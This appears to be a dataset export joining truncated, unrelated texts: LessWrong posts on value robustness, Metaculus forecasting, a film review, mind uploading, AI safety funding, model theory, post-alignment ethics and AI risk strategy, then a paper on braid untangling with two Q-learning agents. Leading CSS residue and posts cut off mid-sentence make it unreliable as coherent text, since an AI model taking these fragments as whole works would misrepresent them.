@font-face {font-family: MJXc-TeX-cal-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Caligraphic-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Caligraphic-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Caligraphic-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-B; src: local('MathJax\_Main Bold'), local('MathJax\_Main-Bold')}
@font-face {font-family: MJXc-TeX-main-Bx; src: local('MathJax\_Main'); font-weight: bold}
@font-face {font-family: MJXc-TeX-main-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-I; src: local('MathJax\_Main Italic'), local('MathJax\_Main-Italic')}
@font-face {font-family: MJXc-TeX-main-Ix; src: local('MathJax\_Main'); font-style: italic}
@font-face {font-family: MJXc-TeX-main-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-R; src: local('MathJax\_Main'), local('MathJax\_Main-Regular')}
@font-face {font-family: MJXc-TeX-main-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-math-I; src: local('MathJax\_Math Italic'), local('MathJax\_Math-Italic')}
@font-face {font-family: MJXc-TeX-math-Ix; src: local('MathJax\_Math'); font-style: italic}
@font-face {font-family: MJXc-TeX-math-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Math-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Math-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Math-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size1-R; src: local('MathJax\_Size1'), local('MathJax\_Size1-Regular')}
@font-face {font-family: MJXc-TeX-size1-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size1-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size1-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size1-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size2-R; src: local('MathJax\_Size2'), local('MathJax\_Size2-Regular')}
@font-face {font-family: MJXc-TeX-size2-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size2-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size2-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size2-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size3-R; src: local('MathJax\_Size3'), local('MathJax\_Size3-Regular')}
@font-face {font-family: MJXc-TeX-size3-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size3-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size3-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size3-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size4-R; src: local('MathJax\_Size4'), local('MathJax\_Size4-Regular')}
@font-face {font-family: MJXc-TeX-size4-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size4-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size4-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size4-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-vec-R; src: local('MathJax\_Vector'), local('MathJax\_Vector-Regular')}
@font-face {font-family: MJXc-TeX-vec-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Vector-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Vector-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Vector-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-vec-B; src: local('MathJax\_Vector Bold'), local('MathJax\_Vector-Bold')}
@font-face {font-family: MJXc-TeX-vec-Bx; src: local('MathJax\_Vector'); font-weight: bold}
@font-face {font-family: MJXc-TeX-vec-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Vector-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Vector-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Vector-Bold.otf') format('opentype')}
)
1. Larger neighbourhood → larger basin
2. Said subset is a "naturalish" abstraction
1. The more natural the abstraction, the more robust values are
2. Example operationalisations of "naturalish abstraction"
1. The subset is highly privileged by the inductive biases of most learning algorithms that can efficiently learn our universe
* More privileged → more natural
2. Most efficient representations of our universe contain a simple embedding of the subset
* Simpler embeddings → more natural
3. Points within this basin are suitable targets for optimisation
1. The stronger the optimisation pressure applied for which the target is still suitable, the more robust values are.
2. Example operationalisations of "suitable targets for optimisation":
1. Optimisation of this target is existentially safe[[4]](#fnyv07rz4tpq)
2. More strongly, we would be "happy" (where we fully informed) for the system to optimise for these points
The above claims specify different dimensions of "robustness". Questions about robustness should be understood as asking about all of them.
---
Why Does it Matter?
===================
The degree to which values are robust seems to be very relevant from an AI existential safety perspective.
* The more robust values are, the more likely we are to get [alignment by default](https://www.lesswrong.com/posts/Nwgdq6kHke5LY692J/alignment-by-default) (and vice versa).
* The more robust values are, the easier it is to target AI systems at ideal values (and vice versa).
+ Such targeting is one approach to solve the alignment problem[[5]](#fn708ty5ja7a7)
+ If values are insufficiently robust, then [value learning](https://www.lesswrong.com/tag/value-learning) may not be viable at all
- Including approaches like RHLF, CIRL/DIRL, etc.
- It may not be feasible to train a system to optimise for suitable targets
---
Questions
=========
A. What's the best/most compelling evidence/arguments in favour of robust values
B. What's the best/most compelling evidence/arguments against robust values?
C. To what degree do you think values are robust?
I am explicitly soliciting opinions, so do please answer even if you do not believe your opinion to be particularly informed.
1. **[^](#fnref9jcddbn79a4)**Using the shard theory conception of "value" as "contextual influence on decision making".
2. **[^](#fnrefdzq2mb4spjb)**To be clear, "example operationalisation" in this document does not refer to any kind of canonical formalisations. The example operationalisations aren't even necessarily correct/accurate/sensible. They are meant to simply gesture in the right direction for what those terms might actually cash out to.
3. **[^](#fnrefhxfnro75cc)**"Benevolent": roughly the subset of human values that we are happy for arbitrarily capable systems to optimise for.
"Universal": roughly the subset of human values that we are happy for other humans to optimise for.
4. **[^](#fnrefyv07rz4tpq)**Including "[astronomical waste](https://nickbostrom.com/astronomical/waste)" as an existential catastrophe.
5. **[^](#fnref708ty5ja7a7)**The other approach being to safeguard systems that may not necessarily be optimising for values that we'd be "happy" for them to pursue, were we fully informed.
Examples of safeguarding approaches: corrigibility, impact regularisation, myopia, non-agentic system design, quantilisation, etc. |
e3a1dc98-177a-4fce-b120-0080a82aa099 | trentmkelly/LessWrong-43k | LessWrong | The Walking Dead
Information asymmetry is a funny thing.
A while ago I created a question asking "Will NASA return a sample of material from the surface of Mars to Earth before SpaceX Starship lands on Mars?". Currently the odds according to the Metaculus prediction are that there's an 80% chance Starship will land on Mars before the sample-return mission is complete. How different would NASA's Mars exploration program look if everyone working there believed this to be the case? What if every American believed this to be the case?
Now Metaculus could be wrong of course, but its predictions are historically well-calibrated and it has a track-record of beating the experts (for example on covid-19). That means anyone--and specifically anyone reading this post--has access to information that while not "secret" is hardly general knowledge.
Other than writing dire letters to NASA about how SLS is a waste of money because it is likely to succeed at about 2 launches prior to 2030, what can you do with this information?
Consider Metaculus' prediction that the first AGI will be created around 2052. Or the fact that there is a 30% chance of China annexing Taiwain in the same time frame? Or that there is a 50% chance another cryptocurrency will eclipse Bitcoin by 2026?
Here is the point: many future changes are highly predictable, but people for the most part go about their lives acting as though things will continue more or less the way they always have. Don't be that way! Imagine you were born with a superpower that gave you prophetic insight into the future. It wouldn't just be dumb to ignore that power, it would borderline reprehensible. We have a moral obligation to warn the world around us about the changes that are coming.
To warn them that they are the walking dead.
P.S.
It would be really cool to create a project that studies on which topics Metaculus disagrees most with the average expert (or the average member of the public) and somehow systematically make use of |
a3354da5-e7fa-4ad3-929a-949915903796 | trentmkelly/LessWrong-43k | LessWrong | [Review] Edge of Tomorrow (2014)
This post contains spoilers for Edge of Tomorrow (2014) and All You Need is Kill (2004).
Spoiler-Free tl;dr
Watch Edge of Tomorrow up until the scene at the dam. Skip the rest of the film and read All You Need is Kill instead.
Spoilerific Review
Edge of tomorrow is Groundhog Day (1993) except instead of taking place in a small town in the 90s it takes places on the Invasion of Normandy in a future war against aliens.
Act 1
In the first scene, Tom Cruise goes through his day normally. He dies and comes back to life. He relives the same day over and over until he gets used to how the time loop works. At the end of Act 1, Tom Cruise discovers that war heroine Emily Blunt used to have the time travel power too and they team up.
Act 2
Emily Blunt trains Tom Cruise to fight. They fight the aliens over and over again, getting a little better each time.
Act 3
In Act 3 Tom Cruise loses his time travel power. Together, he and Emily Blunt have only one shot to kill the boss alien.
Act 1 and Act 2 make sense. They're structurally identical to Groundhog Day. But Act 3 is awful. This is a time travel movie. In Act 3 there's no time travelling! It turns into a generic action flick.
What happened?
All You Need is Kill
Edge of Tomorrow was originally based on the Japanese light novel All You Need is Kill. Act 1 and Act 2 are the same. I hypothesize Act 3 was modified for American audiences.
In All You Need is Kill, Emily Blunt never loses her time travelling power. She fights alongside Tom Cruise as an equal. They kill the boss alien together.
But the story doesn't end there.
In All You Need is Kill there is a detailed explanation about how the time travel works. To escape each time loop our heroes need to kill the alien loopers, leaving only themselves. But since both Tom Cruise and Emily Blunt are both loopers, only one of them can escape the final time loop. One of them has to die.
So at the end of the story there's a big epic duel to the death between o |
8edeec28-b3e6-4f26-b218-2c48a96a3767 | StampyAI/alignment-research-dataset/lesswrong | LessWrong | Continuity in Uploading
I don't acknowledge an upload as "me" in any meaningful sense of the term; if I copied my brain to a computer and then my body was destroyed, I still think of that as death and would try to avoid it.
A thought struck me a few minutes ago that seems like it might get around that, though. Suppose that rather than copying my brain, I adjoined it to some external computer in a kind of reverse-[Ebborian](/lw/ps/where_physics_meets_experience/) act; electrically connecting my synapses to a big block of computrons that I can consciously perform I/O to. Over the course of life and improved tech, that block expands until, as a percentage, most of my thought processes are going on in the machine-part of me. Eventually my meat brain dies -- but the silicon part of me lives on. I think I would probably still consider that "me" in a meaningful sense. Intuitively I feel like I should treat it as the equivalent of minor brain damage.
Obviously, one could shorten the period of dual-life arbitrarily and I can't point to a specific line where expanded-then-contracted-consciousness turns into copying-then-death. The line that immediately comes to mind is "whenever I start to feel like the technological expansion of my mind is no longer an external module, but the main component," but that feels like unjustified punting.
I'm curious what other people think, particularly those that share my position on destructive uploads.
---
Edited to add:
Solipsist asked me for the [reasoning behind my position](/r/discussion/lw/jip/continuity_in_uploading/aea6) on destructive uploads, which led to this additional train of thought:
Compare a destructive upload to non-destructive. Copy my mind to a machine non-destructively, and I still identify with meat-me. You could let machine-me run for a day, or a week, or a year, and only then kill off meat-me. I don't like that option and would be confused by someone who did. Destructive uploads feel like the limit of that case, where the time interval approaches zero and I am killed and copied in the same moment. As with the case outlined above, I don't see a crossed line where it stops being death and starts being transition.
An expand-contract with interval zero is effectively a destructive upload. So is a copy-kill with interval zero. So the two appear to be mirror images, with a discontinuity at the limit. Approach destructive uploads from the copy-then-kill side, and it feels clearly like death. Approach them from the expand-then-contract side, and it feels like continuous identity. Yet at the limit between them they turn into the same operation. |
3a5bec56-5111-4fb0-9937-aff0e05dfecd | trentmkelly/LessWrong-43k | LessWrong | How to turn money into AI safety?
Related: Suppose $1 billion is given to AI Safety. How should it be spent? , EA is vetting-constrained, What to do with people?
I
I have heard through the grapevine that we seem to be constrained - there's money that donors and organizations might be happy to spend on AI safety work, but aren't because of certain bottlenecks - perhaps talent, training, vetting, research programs, or research groups are in short supply. What would the world look like if we'd widened some of those bottlenecks, and what are local actions that people can do to move in that direction? I'm not an expert either from the funding or organizational side, but hopefully I can leverage Cunningham's law and get some people more in the know to reply in the comments.
Of the bottlenecks I listed above, I am going to mostly ignore talent. IMO, talented people aren't the bottleneck right now, and the other problems we have are more interesting. We need to be able to train people in the details of an area of cutting-edge research. We need a larger number of research groups that can employ those people to work on specific agendas. And perhaps trickiest, we need to do this within a network of reputation and vetting that makes it possible to selectively spend money on good research without warping or stifling the very research it's trying to select for.
In short, if we want to spend money, we can't just hope that highly-credentialed, high-status researchers with obviously-fundable research will arise by spontaneous generation. We need to scale up the infrastructure. I'll start by taking the perspective of individuals trying to work on AI safety - how can we make it easier for them to do good work and get paid?
There are a series of bottlenecks in the pipeline from interested amateur to salaried professional. From the the individual entrant's perspective, they have to start with learning and credentialing. The "obvious path" of training to do AI safety research looks like getting a bachelor's or PhD i |
c4ad8e47-8fd8-4fe4-a8c5-0ebded310612 | trentmkelly/LessWrong-43k | LessWrong | [LINK] Climate change and food security
A Guardian article on the impact of climate change on food security. This is worrying (albeit perhaps not a global catastrophic (or existential) risk). It has the potential to wipe out the gains made against extreme poverty in the last few decades.
Should we be so pessimistic? Climate change might be averted through government action or a technological fix; or the poorest might get rich enough to be protected from this insecurity; or we could see a second 'Green Revolution' with GM, etc. I've also seen some discussion that climate change could in fact increase food cultivation - in Russia and Canada for example.
How do people feel about this - optimistic or pessimistic? |
b7a66e45-ed6c-43b7-9275-a4299aaf49a4 | trentmkelly/LessWrong-43k | LessWrong | AI Risk and Opportunity: A Strategic Analysis
Suppose you buy the argument that humanity faces both the risk of AI-caused extinction and the opportunity to shape an AI-built utopia. What should we do about that? As Wei Dai asks, "In what direction should we nudge the future, to maximize the chances and impact of a positive intelligence explosion?"
This post serves as a table of contents and an introduction for an ongoing strategic analysis of AI risk and opportunity.
Contents:
1. Introduction (this post)
2. Humanity's Efforts So Far
3. A Timeline of Early Ideas and Arguments
4. Questions We Want Answered
5. Strategic Analysis Via Probability Tree
6. Intelligence Amplification and Friendly AI
7. ...
Why discuss AI safety strategy?
The main reason to discuss AI safety strategy is, of course, to draw on a wide spectrum of human expertise and processing power to clarify our understanding of the factors at play and the expected value of particular interventions we could invest in: raising awareness of safety concerns, forming a Friendly AI team, differential technological development, investigating AGI confinement methods, and others.
Discussing AI safety strategy is also a challenging exercise in applied rationality. The relevant issues are complex and uncertain, but we need to take advantage of the fact that rationality is faster than science: we can't "try" a bunch of intelligence explosions and see which one works best. We'll have to predict in advance how the future will develop and what we can do about it.
Core readings
Before engaging with this series, I recommend you read at least the following articles:
* Muehlhauser & Salamon, Intelligence Explosion: Evidence and Import (2013)
* Yudkowsky, AI as a Positive and Negative Factor in Global Risk (2008)
* Chalmers, The Singularity: A Philosophical Analysis (2010)
Example questions
Which strategic questions would we like to answer? Muehlhauser (2011) elaborates on the following questions:
* What methods can we use to predict tec |
92220b9a-b8e2-465a-9360-91c8ffbef886 | trentmkelly/LessWrong-43k | LessWrong | Endo-, Dia-, Para-, and Ecto-systemic novelty
[Metadata: crossposted from https://tsvibt.blogspot.com/2023/01/endo-dia-para-and-ecto-systemic-novelty.html. First completed January 10, 2023. This essay is more like research notes than exposition, so context may be missing, the use of terms may change across essays, and the text might be revised later; only the versions at tsvibt.blogspot.com are definitely up to date.]
Novelty can be coarsely described as one of: fitting within a preexisting system; constituting a shift of the system; creating a new parallel subsystem; or standing unintegrated outside the system.
Thanks to Sam Eisenstat for related conversations.
Novelty is understanding (structure, elements) that a mind acquires (finds, understands, makes its own, integrates, becomes, makes available for use to itself or its elements, incorporates into its thinking). A novel element (that is, structure that wasn't already there in the mind fully explicitly) can relate to the mind in a few ways, described here mainly by analogy and example. A clearer understanding of novelty than given here might clarify the forces acting in and on a mind when it is acquiring novelty, such as "value drives".
Definitions
"System" ("together-standing") is used here to emphasize the network of relations between elements of a mind.
These terms aren't supposed to be categories, but more like overlapping regions in the space of possibilities for how novelty relates to the preexisting mind.
Endosystemic novelty (or "basis-aligned" or "in-ontology") is novelty that is integrated into the mind by fitting alongside and connecting to other elements, in ways analogous to how preexisting elements fit in with each other. Endosystemic novelty is "within the system"; it's within the language, ontology, style of thinking, conceptual scheme, or modus operandi of the preexisting mind.
Diasystemic novelty (or "cross-cutting" or "basis-skew" or "ontological shift") is novelty that is constituted as a novel structure of the mind by many shi |
b6e83a38-d5a0-473d-ae7d-cace2dd73666 | trentmkelly/LessWrong-43k | LessWrong | Mental Context for Model Theory
I'm reviewing the books on the MIRI course list. After my first four book reviews I took a week off, followed up on some dangling questions, and upkept other side projects. Then I dove into Model Theory, by Chang and Keisler.
It has been three weeks. I have gained a decent foundation in model theory (by my own assessment), but I have not come close to completing the textbook. There are a number of other topics I want to touch upon before December, so I'm putting Model Theory aside for now. I'll be revisiting it in either January or March to finish the job.
In the meantime, I do not have a complete book review for you. Instead, this is the first of three posts on my experience with model theory thus far.
This post will give you some framing and context for model theory. I had to hop a number of conceptual hurdles before model theory started making sense — this post will contain some pointers that I wish I'd had three weeks ago. These tips and realizations are somewhat general to learning any logic or math; hopefully some of you will find them useful.
Shortly, I'll post a summary of what I've learned so far. For the casual reader, this may help demystify some heavily advanced parts of the Heavily Advanced Epistemology sequence (if you find it mysterious), and it may shed some light on some of the recent MIRI papers. On a personal note, there's a lot I want to write down & solidify before moving on.
In follow-up post, I'll discuss my experience struggling to learn something difficult on my own — model theory has required significantly more cognitive effort than did the previous textbooks.
Between what was meant and what was said
Model theory is an abstract branch of mathematical logic, which itself is already too abstract for most. So allow me to motivate model theory a bit.
At its core, model theory is the study of what you said, as opposed to what you meant. To give some intuition for this, I'll re-tell an overtold story about an ancient branch of math.
In |
bece90c7-dc55-46ce-916a-01f43da06e59 | trentmkelly/LessWrong-43k | LessWrong | After Alignment — Dialogue between RogerDearnaley and Seth Herd
RogerDearnaley
Hi Seth! So, what did you want to discuss?
Seth Herd
I'd like to primarily discuss your AI, Alignment and Ethics sequence. You made a number of points that I think LWers will be interested in. I'll try to primarily act as an interviewer, although I do have one major and a number of minor points I'd like to get in there. I'm hoping to start at the points that will be of most interest to the most people.
RogerDearnaley
Sure, I'm very happy to talk about it. For background, that was originally world-building thinking that I did for a (sadly still unpublished) SF novel-trilogy that I worked on for about a decade, starting about 15 years ago, now rewritten in the format of Less Wrong posts. The novel was set far enough in the future that people clearly had AI and had long since solved the Alignment Problem, so I needed to figure out what they had then pointed the AIs at. So I had to solve ethics :-)
Seth Herd
Okay, right. That's how I read it: an attempt to make an ethical system we'd want if we achieved ASI alignment.
RogerDearnaley
Yeah, that was basically the goal. Which required me to first figure out how to think about ethics without immediately tripping over a tautology.
Seth Herd
It had a number of non-obvious claims. Let me list a few that were of most interest to me:
1. It's not a claim about moral realism. It's a claim about what sort of ethical system humans would want, extending into the future.
2. In this system, AIs and animals don't get votes. Only humans do.
3. Uploads of human minds only get one vote per original human.
RogerDearnaley
Some of these properties were also deeply inobvious to me too: I wrote for several years assuming that the AIs had moral weight/rights/votes, in fact greater than the humans, in proportion to the logarithm of their intelligence (roughly log parameter count), before finally realizing that made no sense, because if they were fully aligned they wouldn't want moral weight/etc, and would have rather limi |
66424b93-a58c-411c-9dfa-5e91b9ea82c6 | StampyAI/alignment-research-dataset/arxiv | Arxiv | Untangling Braids with Multi-agent Q-Learning
I Introduction
---------------
Braids are mathematical objects from low-dimensional topology which can be successfully encoded with sequences of letters and, therefore, studied using algebra or, as we do in this study, using some computer-scientific approach. A braid on n𝑛nitalic\_n strands consists of n𝑛nitalic\_n ropes whose left-hand ends are fixed one under another and whose right-hand ends are fixed one under another; you can imagine that the braid is laid out on a table, and the ends of the ropes are attached to the table with nails. Figures [1](#S1.F1 "Figure 1 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [2](#S1.F2 "Figure 2 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [3](#S1.F3 "Figure 3 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") show examples of braids on 3333 strands.
Figure 1: Braid aabaBBAB𝑎𝑎𝑏𝑎𝐵𝐵𝐴𝐵aabaBBABitalic\_a italic\_a italic\_b italic\_a italic\_B italic\_B italic\_A italic\_B
Figure 2: Braid baBABaBb𝑏𝑎𝐵𝐴𝐵𝑎𝐵𝑏baBABaBbitalic\_b italic\_a italic\_B italic\_A italic\_B italic\_a italic\_B italic\_b
Two braids are *equivalent* to one another if they can be transformed into one another by shifting and twisting the middle parts of the ropes (without touching the ends of the ropes). For example, the two braids in Figures [1](#S1.F1 "Figure 1 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [2](#S1.F2 "Figure 2 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") are equivalent to one another, although it is difficult to see it. They are also what is called *trivial* braids, in the sense that they are equivalent to the braid without any intersections of ropes, shown in Figure [3](#S1.F3 "Figure 3 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.").
Figure 3: The trivial braid without intersections
Now let us explain how braids can be represented conveniently in the computer. A braid is considered as a sequence of its simple fragments; for braids on 3333 strands, these are the fragments shown in Figure [4](#S1.F4 "Figure 4 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), which we denote by A,a,B,b,1𝐴𝑎𝐵𝑏1A,a,B,b,1italic\_A , italic\_a , italic\_B , italic\_b , 1 (and which in mathematical papers are usually denoted by σ1,σ1−1,σ2,σ2−1,1subscript𝜎1superscriptsubscript𝜎11subscript𝜎2superscriptsubscript𝜎211\sigma\_{1},\sigma\_{1}^{-1},\sigma\_{2},\sigma\_{2}^{-1},1italic\_σ start\_POSTSUBSCRIPT 1 end\_POSTSUBSCRIPT , italic\_σ start\_POSTSUBSCRIPT 1 end\_POSTSUBSCRIPT start\_POSTSUPERSCRIPT - 1 end\_POSTSUPERSCRIPT , italic\_σ start\_POSTSUBSCRIPT 2 end\_POSTSUBSCRIPT , italic\_σ start\_POSTSUBSCRIPT 2 end\_POSTSUBSCRIPT start\_POSTSUPERSCRIPT - 1 end\_POSTSUPERSCRIPT , 1).
Figure 4: Braid fragments A,a,B,b,1𝐴𝑎𝐵𝑏1A,a,B,b,1italic\_A , italic\_a , italic\_B , italic\_b , 1
Using this convenient notation, we can now say that the braids in Figures [1](#S1.F1 "Figure 1 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [2](#S1.F2 "Figure 2 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") are aabaBBAB𝑎𝑎𝑏𝑎𝐵𝐵𝐴𝐵aabaBBABitalic\_a italic\_a italic\_b italic\_a italic\_B italic\_B italic\_A italic\_B and baBABaBb𝑏𝑎𝐵𝐴𝐵𝑎𝐵𝑏baBABaBbitalic\_b italic\_a italic\_B italic\_A italic\_B italic\_a italic\_B italic\_b. This notation is useful not only for describing braids, but also for checking if two braids are equivalent. Indeed, it is known that two braids are equivalent if and only if one can be transformed to the other using rules called the second Reidemeister move and the third Reidemeister move.
The *second Reidemeister move* is the rule stating that Aa𝐴𝑎Aaitalic\_A italic\_a and aA𝑎𝐴aAitalic\_a italic\_A are equivalent to 11111111, and Bb𝐵𝑏Bbitalic\_B italic\_b and bB𝑏𝐵bBitalic\_b italic\_B are also equivalent to 11111111. (An algebraist studying braids in the context of group theory would also add that 11 is equivalent to 1; however, we felt that the performance of our AI will be best if we omit this non-essential rule.) The *third Reidemeister move* is the rule stating that ABA𝐴𝐵𝐴ABAitalic\_A italic\_B italic\_A is equivalent to BAB𝐵𝐴𝐵BABitalic\_B italic\_A italic\_B.
Our general aim is to produce tangled braids and to untangle braids using reinforcement learning (RL). A recent study [[9](#bib.bib9)] uses RL to untangle knots using a version of Reidemeister moves known as Markov moves. The novelty of our approach is the use two agents: one for tangling and one for untangling.
In this pilot study we concentrate on braids with 2222 and 3333 strands. For braids with 2222 strands the problem is equivalent to simplifying words in a group given by a presentation ⟨a,b|ab=ba=1⟩inner-product𝑎𝑏
𝑎𝑏𝑏𝑎1\langle a,b|ab=ba=1\rangle⟨ italic\_a , italic\_b | italic\_a italic\_b = italic\_b italic\_a = 1 ⟩. In our experiments we choose to use the moves which preserve the length of the braid, for example, ab𝑎𝑏abitalic\_a italic\_b simplifies to 11111111 and not 1111. We approach the problem of untangling braids with two strands as a symbol game. The input string of length n will consist of 3 symbols: [’a𝑎aitalic\_a’, ‘b𝑏bitalic\_b’, ‘1111’]. The task of the untangling agent is to convert the string to have all characters as ‘1111’ (untangled state).
Following are the allowed moves:
1a=a11𝑎𝑎11a=a11 italic\_a = italic\_a 1;
1b=b11𝑏𝑏11b=b11 italic\_b = italic\_b 1;
ab=ba=11𝑎𝑏𝑏𝑎11ab=ba=11italic\_a italic\_b = italic\_b italic\_a = 11. (In another experiment we used the moves
1a=a11𝑎𝑎11a=a11 italic\_a = italic\_a 1;
1b=b11𝑏𝑏11b=b11 italic\_b = italic\_b 1;
aa=bb=11𝑎𝑎𝑏𝑏11aa=bb=11italic\_a italic\_a = italic\_b italic\_b = 11, corresponding to the group ⟨a,b|aa=bb=1⟩inner-product𝑎𝑏
𝑎𝑎𝑏𝑏1\langle a,b|aa=bb=1\rangle⟨ italic\_a , italic\_b | italic\_a italic\_a = italic\_b italic\_b = 1 ⟩.)
All such moves are implemented in both directions.
We also experimented with braids with three strands, where following transformations are allowed, Aa=aA=11; Bb=bB=11; A1=1A; a1=1a; B1=1B; b1=1b. We approach the problem of untangling braids on 3 strands as a game played between two players, player 1 (the tangling player) and player 2 (the untangling player). Player 1 starts with an untangled braid as in Figure [3](#S1.F3 "Figure 3 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") and applies Reidemeister moves to tangle the braid. For example, braids in Figures [1](#S1.F1 "Figure 1 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313."), [2](#S1.F2 "Figure 2 ‣ I Introduction ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") were produced by player 1 after approximately 150 games against player 2. Once player 1 has created a tangled braid after a fixed number of steps, that would be the input for the player 2 (untangling player); the task of player 2 is to apply Reidemeister moves to reach a fixed target output, that would be all 1’s (untangled state).
